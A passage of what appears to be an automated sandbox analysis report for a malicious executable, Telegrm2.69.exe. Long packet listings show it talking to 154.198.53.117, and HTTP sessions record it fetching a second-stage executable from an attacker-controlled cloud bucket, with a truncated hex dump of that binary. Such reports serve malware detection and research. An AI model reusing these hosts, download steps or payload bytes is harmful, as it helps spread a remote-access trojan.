                                          Aug 4, 2024 12:47:21.980171919 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980207920 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980227947 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.980227947 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.980242014 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980271101 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980305910 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.980329990 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980365038 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980391979 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980421066 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.980423927 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980442047 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.980457067 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980506897 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980544090 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.980565071 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980597973 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980626106 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980674982 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980674028 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.980674028 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.980707884 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980736971 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980767965 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980818987 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980846882 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980947018 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.980973959 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.981008053 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.981008053 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.981008053 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.981060028 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.981089115 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.981132984 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.981132984 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.981139898 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.981168985 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.981261969 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.981309891 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.981373072 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.981415987 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.981456995 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.981456995 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.981456995 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.982366085 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982407093 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982444048 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982469082 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.982480049 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982534885 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982568979 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982584000 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.982604027 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982656002 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982659101 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.982686043 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982711077 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.982717991 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982752085 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982779026 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982812881 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982835054 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.982835054 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.982870102 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982903957 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982930899 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982952118 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.982963085 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.982975006 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.983000994 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983033895 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983067989 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983089924 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.983095884 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983110905 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.983181953 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983210087 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983238935 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.983247042 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983378887 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983431101 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983436108 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.983458996 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983491898 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983510971 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.983525038 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983535051 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.983760118 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983788967 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983813047 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.983880043 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983907938 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983971119 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.983978987 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.984000921 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984054089 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984064102 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.984086990 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984117031 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984128952 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.984148026 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984164000 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.984184027 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984234095 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.984275103 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984306097 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984426975 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984457970 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984478951 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.984519005 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984568119 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.984690905 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984747887 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.984761953 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984796047 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984848022 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.984894037 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984946012 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.984977007 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985002041 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985043049 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985121965 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985151052 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985171080 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985182047 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985191107 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985234976 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985269070 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985290051 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985333920 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985363007 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985395908 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985415936 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985503912 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985532999 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985558987 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985579014 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985582113 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985611916 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985642910 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985666037 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985711098 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985760927 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985809088 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985829115 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985858917 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985912085 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.985943079 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985970020 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.985987902 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.986092091 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986140013 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986146927 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.986191034 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986218929 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986267090 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.986283064 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986316919 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986365080 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.986438990 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986486912 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986491919 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.986598015 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986624956 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986654043 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.986709118 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986736059 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986788034 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.986800909 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986850023 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986902952 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.986912012 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.986963034 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.986974001 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987050056 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987106085 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.987123966 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987188101 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987258911 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987308979 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.987350941 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987413883 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987462997 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.987502098 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987632990 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987660885 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987684965 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.987693071 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987704992 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.987787008 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987814903 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987842083 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.987941980 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.987970114 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988022089 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.988102913 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988132954 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988188028 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.988238096 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988291979 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.988348007 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988398075 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988425970 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988454103 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.988559961 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988588095 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988727093 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988754034 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988765955 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.988797903 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.988852978 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988882065 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.988934994 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.989003897 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989032984 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989090919 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.989188910 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989217043 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989242077 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.989324093 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989352942 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989382982 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.989434004 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989605904 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989634991 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989661932 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.989666939 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989682913 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.989778042 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989810944 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989842892 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989864111 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.989891052 CEST497399000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:21.989964962 CEST900049739154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:21.989993095 CEST900049739154.198.53.117192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Aug 4, 2024 12:47:07.290215015 CEST192.168.2.41.1.1.10xb62bStandard query (0)jerryrat2024.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Aug 4, 2024 12:47:07.340619087 CEST1.1.1.1192.168.2.40xb62bNo error (0)jerryrat2024.oss-cn-beijing.aliyuncs.com39.97.203.40A (IP address)IN (0x0001)false

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449732154.198.53.1172806400C:\Users\user\Desktop\Telegrm2.69.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 4, 2024 12:46:59.920718908 CEST76OUTGET /Test.txt HTTP/1.1
                                          Connection: Keep-Alive
                                          Host: 154.198.53.117:280
                                          Aug 4, 2024 12:47:00.826826096 CEST196INHTTP/1.1 200 OK
                                          Content-Type: text/plain
                                          Content-Length: 1201
                                          Accept-Ranges: bytes
                                          Server: HFS 2.2f
                                          Content-Disposition: filename="Test.txt";
                                          Last-Modified: Fri, 02 Aug 2024 05:31:13 GMT


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.44973539.97.203.40806400C:\Users\user\Desktop\Telegrm2.69.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 4, 2024 12:47:07.348227978 CEST112OUTGET /arphaCrashReport64.exe HTTP/1.1
                                          Connection: Keep-Alive
                                          Host: jerryrat2024.oss-cn-beijing.aliyuncs.com
                                          Aug 4, 2024 12:47:08.258024931 CEST1236INHTTP/1.1 200 OK
                                          Server: AliyunOSS
                                          Date: Sun, 04 Aug 2024 10:47:08 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 238384
                                          Connection: keep-alive
                                          x-oss-request-id: 66AF5C2C0BFF4B35342476DF
                                          Accept-Ranges: bytes
                                          ETag: "8B5D51DF7BBD67AEB51E9B9DEE6BC84A"
                                          Last-Modified: Fri, 19 Jul 2024 07:12:21 GMT
                                          x-oss-object-type: Normal
                                          x-oss-hash-crc64ecma: 5816712042177015287
                                          x-oss-storage-class: Standard
                                          x-oss-ec: 0048-00000113
                                          Content-Disposition: attachment
                                          x-oss-force-download: true
                                          Content-MD5: i11R33u9Z661Hpud7mvISg==
                                          x-oss-server-time: 2
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e1 d0 a5 69 a5 b1 cb 3a a5 b1 cb 3a a5 b1 cb 3a c0 d7 c8 3b a0 b1 cb 3a c0 d7 ce 3b 29 b1 cb 3a f7 d9 cf 3b b7 b1 cb 3a f7 d9 c8 3b ad b1 cb 3a f7 d9 ce 3b 90 b1 cb 3a c0 d7 cf 3b ae b1 cb 3a c0 d7 ca 3b b7 b1 cb 3a 33 d8 ca 3b a6 b1 cb 3a a5 b1 ca 3a 0b b1 cb 3a 33 d8 ce 3b a2 b1 cb 3a 33 d8 34 3a a4 b1 cb 3a a5 b1 5c 3a a4 b1 cb 3a 33 d8 c9 3b a4 b1 cb 3a 52 69 63 68 a5 b1 cb 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 1f 1b f1 60 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 10 00 06 02 00 00 74 01 00 00 00 00 00 24 ea 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED]
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$i:::;:;):;:;:;:;:;:3;:::3;:34::\::3;:Rich:PEd`"t$@j`p-Ph0;lP8( @.text `.rdataF @@.dataL& @.pdata
                                          Aug 4, 2024 12:47:08.258085966 CEST1236INData Raw: 00 98 1c 00 00 00 50 03 00 00 1e 00 00 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d8 2d 00 00 00 70 03 00 00 2e 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c
                                          Data Ascii: P@@.rsrc-p.2@@.relocl`@B
                                          Aug 4, 2024 12:47:08.258122921 CEST1236INData Raw: 33 c9 eb 1b 33 d2 48 c7 c0 ff ff ff ff 48 f7 f1 49 3b c0 72 3e 49 0f af c8 48 83 f9 e7 77 34 48 8d 51 18 48 8b 4f 08 48 8b 01 ff 10 48 85 c0 74 22 8d 4b ff 48 89 38 89 48 0c c7 40 10 01 00 00 00 c7 40 08 00 00 00 00 48 8b 5c 24 30 48 83 c4 20 5f
                                          Data Ascii: 33HHI;r>IHw4HQHOHHt"KH8H@@H\$0H _H\$03H _HIL3H%xHHIHH`HtHIL3H%@SH eH%XSHH99^H
                                          Aug 4, 2024 12:47:08.258156061 CEST672INData Raw: 0f 85 43 14 00 00 c3 cc cc 48 8d 41 08 48 39 01 0f 85 43 14 00 00 c3 cc cc 40 57 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 40 48 89 74 24 48 48 8b f9 48 8b 19 48 85 db 74 7a 48 8b 71 08 48 3b de 74 2f 0f 1f 00 48 8b 13 48 83 ea 18 b8 ff
                                          Data Ascii: CHAH9C@WH0HD$ H\$@Ht$HHHHtzHqH;t/HHBHHPHH;uHHWH+HHrH'HCH+HHw)HH3HHGHGH\$@Ht$HH0_@WAVAWH0HD$ H\$PH
                                          Aug 4, 2024 12:47:08.258189917 CEST1236INData Raw: cc cc cc cc cc cc cc cc cc 48 8b 49 08 48 ff 25 0d 0a 02 00 cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 48 85 c9 74 14 ff 15 21 05 02 00 33 c0 48 89 03 89 43 08 48 83 c4 20 5b c3 33 c0 89 43 08 48 83 c4 20 5b c3 48 89 5c 24 08 57 48 83 ec
                                          Data Ascii: HIH%@SH HHHt!3HCH [3CH [H\$WH HHHH _HK&HK T{HtHK CHHKHK3HtH{HKHtH{{H\$0H _@SH yHtHC
                                          Aug 4, 2024 12:47:08.258222103 CEST1236INData Raw: 57 b8 a0 21 00 00 e8 aa c7 00 00 48 2b e0 48 c7 44 24 70 fe ff ff ff 48 8b 05 3f 00 03 00 48 33 c4 48 89 84 24 90 21 00 00 4d 8b f8 4c 89 44 24 58 4c 8b ea 4c 8b e1 48 89 4c 24 40 48 89 54 24 48 4c 89 44 24 50 4c 89 4c 24 68 48 8d 94 24 90 01 00
                                          Data Ascii: W!H+HD$pH?H3H$!MLD$XLLHL$@HT$HLD$PLL$hH$HH$uXgHH$u@GHH$uX)HH${XfI$frf
                                          Aug 4, 2024 12:47:08.258327007 CEST448INData Raw: 00 48 39 84 24 80 00 00 00 74 64 48 8d 8c 24 80 00 00 00 e8 d9 07 00 00 eb 55 48 8d 84 24 90 01 00 00 48 c7 c6 ff ff ff ff 0f 1f 84 00 00 00 00 00 48 8d 76 01 66 83 3c 70 00 75 f5 8d 04 75 02 00 00 00 89 44 24 28 48 8d 84 24 90 01 00 00 41 b9 01
                                          Data Ascii: H9$tdH$UH$HHvf<puuD$(H$AHD$ E3IIME33H$!H3H!A_A^A]A\_^[*$/$4$9$
                                          Aug 4, 2024 12:47:08.258361101 CEST1236INData Raw: 03 c9 44 3b c9 0f 8e a5 00 00 00 44 3b cf 0f 8e 9c 00 00 00 8b 43 04 44 3b c8 7c 40 0f 1f 44 00 00 3d ff ff ff 3f 0f 8f 84 00 00 00 03 c0 89 43 04 44 3b c8 7d eb 8b d0 b8 ff ff ff ff 48 03 d2 48 3b d0 77 6b 48 8b 4b 08 8b d2 ff 15 90 fe 01 00 48
                                          Data Ascii: D;D;CD;|@D=?CD;}HH;wkHKHtZHCxPS;}I+;AHcLHCMHcHLHHC?;HC3HcfHBH\$0Ht$8H _H\$03Ht$8H _H(V~H(
                                          Aug 4, 2024 12:47:08.258394957 CEST1236INData Raw: 01 00 ff 15 b5 f5 01 00 48 85 c0 74 20 48 8d 15 71 fe 01 00 48 8b c8 ff 15 30 f6 01 00 48 89 05 11 06 03 00 c6 05 12 06 03 00 01 eb 17 48 8b 05 01 06 03 00 c6 05 02 06 03 00 01 eb 07 48 8b 05 f1 05 03 00 48 8b 0b 48 8b d6 48 85 c0 0f 84 74 ff ff
                                          Data Ascii: Ht HqH0HHHHHHtDCE3H\$@Ht$HH0_H@SH H'f;uf;tH [3H [H\$Hl$Ht$WAVAWH L9HIOAoHP AHLALHt
